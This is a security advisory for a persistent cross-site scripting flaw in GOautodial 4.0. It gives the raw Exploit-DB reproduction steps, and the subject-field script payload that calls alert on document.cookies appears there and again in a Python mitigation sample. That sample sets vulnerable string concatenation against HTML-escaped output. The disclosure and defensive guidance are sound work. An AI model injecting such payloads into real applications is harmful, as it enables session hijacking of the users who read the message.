Vendor: GOautodial 4.0
By: Balzabu
CVSS: 8.8 (HIGH)
Title: Persistent Cross-Site Scripting
CWE: 79
Product Name: GOautodial 4.0
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: goautodial:goautodial_4.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: CentOS 7
Year: 2020

GOautodial 4.0 – Persistent Cross-Site Scripting (Authenticated)

GOautodial 4.0 contains a persistent cross-site scripting (XSS) vulnerability. An authenticated user can inject JavaScript into a message sent to another user (the subject field, per the reproduction steps below); the script executes in the recipient's browser when the message is read.

Mitigation:

Input validation should be used to prevent malicious code from being injected into messages.
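Added example, not GOautodial's own code: the inbox subject cell rendered by string concatenation (the pattern behind this class of bug) beside a hardened version that encodes the subject for its HTML context at render time, plus the store-side validation the advisory recommends as a first filter. The cell markup and the length limit are assumptions; output encoding is applied regardless of validation, because it is the control that still holds when a filter is bypassed.

```python
import html

# Constructed sample input: the subject payload quoted in the advisory's steps.
SAMPLE_SUBJECT = ("Help me, I can't connect to the webphone <script src=1 "
                  'href=1 onerror="javascript:alert(document.cookies)"></script>')

MAX_SUBJECT_LEN = 200  # assumed limit; the real schema is not on the page

def validate_subject(subject: str) -> bool:
    """Store-side input validation (the advisory's stated mitigation):
    reject subjects that carry angle brackets or exceed the length limit.
    This is a first filter, not a substitute for output encoding."""
    return (len(subject) <= MAX_SUBJECT_LEN
            and "<" not in subject and ">" not in subject)

def render_subject_vulnerable(subject: str) -> str:
    """Inbox cell built by concatenation: the stored subject is emitted as-is,
    so the recipient's browser parses any injected markup as HTML."""
    return "<td class='subject'>" + subject + "</td>"

def render_subject_safe(subject: str) -> str:
    """Same cell with the subject encoded for an HTML text context at render
    time; html.escape turns < > & \" ' into entities, so the stored payload is
    displayed as literal text instead of being parsed."""
    return "<td class='subject'>" + html.escape(subject, quote=True) + "</td>"

def cell_contains_markup(rendered: str) -> bool:
    """Check helper: True if the cell body (between the wrapper tags) still
    holds a tag opener, i.e. the encoding did not take effect."""
    body = rendered[len("<td class='subject'>"):-len("</td>")]
    return "<" in body

if __name__ == "__main__":
    print("validation accepts payload:", validate_subject(SAMPLE_SUBJECT))
    print("vulnerable:", render_subject_vulnerable(SAMPLE_SUBJECT))
    print("safe:      ", render_subject_safe(SAMPLE_SUBJECT))
```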

Exploit-DB raw data:

# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
# Author: Balzabu
# Discovery Date: 2020-07-23
# Vendor Homepage: https://goautodial.org/
# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
# Tested Version: 4.0 (Last release as of today)
# Tested on OS: CentOS 7

# STEPS TO REPRODUCE:

# 1 - Log in as an agent
# 2 - Write a new message to user goadmin with:
Subject: Help me, I can't connect to the webphone <script src=1 href=1 onerror="javascript:alert(document.cookies)"></script>
Text: whatever you want
# 3 - Send and wait for goadmin to read the message... :-)